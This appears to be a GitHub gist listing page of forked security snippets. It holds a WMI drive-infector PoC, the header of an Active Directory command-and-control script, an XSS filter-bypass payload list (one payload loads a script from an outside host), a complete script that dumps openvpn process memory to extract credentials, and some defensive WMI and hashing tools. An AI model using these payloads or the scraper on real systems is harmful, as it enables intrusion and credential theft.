##Domain
We need some records on our domain (mydomain.com) DNS for connections. Add these records:
t1 IN NS t1ns.mydomain.com. ; note final the dot!
t1ns IN A OUR_SERVER_IP
##Server
LucaBongiorni
LucaBongiorni
/ Example_WMI_Detection_EventLogAlert.ps1
Created
August 31, 2016 07:37
— forked from mattifestation/Example_WMI_Detection_EventLogAlert.ps1
An example of how to use permanent WMI event subscriptions to log a malicious action to the event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'LateralMovementEvent' | |
| Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ | |
| Namespace = 'root/subscription' |
LucaBongiorni
/ sample_drive_infector.ps1
Created
August 30, 2016 17:34
— forked from mattifestation/sample_drive_infector.ps1
A PoC drive infector using permanent WMI event subscriptions. I wrote this to demonstrate passing __EventFilter arguments to a CommandLineEventConsumer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'DriveChanged' | |
| Query = 'SELECT * FROM Win32_VolumeChangeEvent' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |
LucaBongiorni
/ ADC2.ps1
Created
August 15, 2016 20:04
— forked from HarmJ0y/ADC2.ps1
Command and Control channel through Active Directory Object Properties
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Version 2 | |
| function New-ADPayload { | |
| <# | |
| .SYNOPSIS | |
| Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
| a one-line launcher. | |
| Author: @harmj0y |
LucaBongiorni
/ xxsfilterbypass.lst
Created
August 12, 2016 04:54
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
LucaBongiorni
/ openvpnScraper.sh
Created
August 12, 2016 04:53
— forked from rvrsh3ll/openvpnScraper.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This little hack-job will grab credentials from a running openvpn process in Linux | |
| # Keep in mind this won't work if the user used the --auth-nocache flag | |
| pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}') | |
| echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done | |
| echo "Your credentials should be listed below as username/password" | |
| strings *.dump | awk 'NR>=3 && NR<=4 { print }' | |
| rm *.dump --force |
LucaBongiorni
/ dbg.py
Created
August 9, 2016 14:44
— forked from shuffle2/dbg.py
powersaves-amiibo-frida stuffs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Input MD5 : BB4E83D7A77AADD7F62728314EF09461 | |
| File Name : C:\Program Files (x86)\Powersaves For AMIIBO\Powersaves For AMIIBO.exe | |
| 0x108fd0 : schannel_recv -> log buffer on end | |
| 0x1090d0 : schannel_recv end | |
| 0x108d10 : schannel_send -> log buffer on start | |
| 0xce61 : deals with https "Token" | |
| 0xceab : deals with https "Vuid" |
LucaBongiorni
/ Get-DownloadedPEHashes.ps1
Created
August 9, 2016 14:44
— forked from et0x/Get-DownloadedPEHashes.ps1
Get the hashes of all exe / dll files downloaded from the internet. Checks for the Zone.Identifier ADS and ensures the value is 3.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DownloadedPEHashes | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$true, Position=0)] | |
| [String]$Path, | |
| [Switch]$Recursive = $true | |
| ) | |
| if (!$Path.EndsWith('\')) |
LucaBongiorni
/ DNS tunneling with iodine.md
Created
August 9, 2016 10:08
— forked from nukeador/DNS tunneling with iodine.md
How to install and use iodine for DNS tunneling.
LucaBongiorni
/ hid_ntevent_wmi_event_subscription
Created
August 4, 2016 19:43
— forked from vector-sec/hid_ntevent_wmi_event_subscription
An example of how to use permanent WMI event subscriptions to log that a keyboard/mouse was connected to the windows event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based off @mattifestation's example: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'HumanInterfaceDevice' | |
| Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "Win32_PointingDevice" OR TargetInstance ISA "Win32_KeyBoard"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ |
LucaBongiorni
/ README.md
Created
July 31, 2016 21:07
— forked from leonardofed/README.md
A curated list of AWS resources to prepare for the AWS Certifications
A curated list of AWS resources to prepare for the AWS Certifications
A curated list of awesome AWS resources you need to prepare for the all 5 AWS Certifications. This gist will include: open source repos, blogs & blogposts, ebooks, PDF, whitepapers, video courses, free lecture, slides, sample test and many other resources.
Index: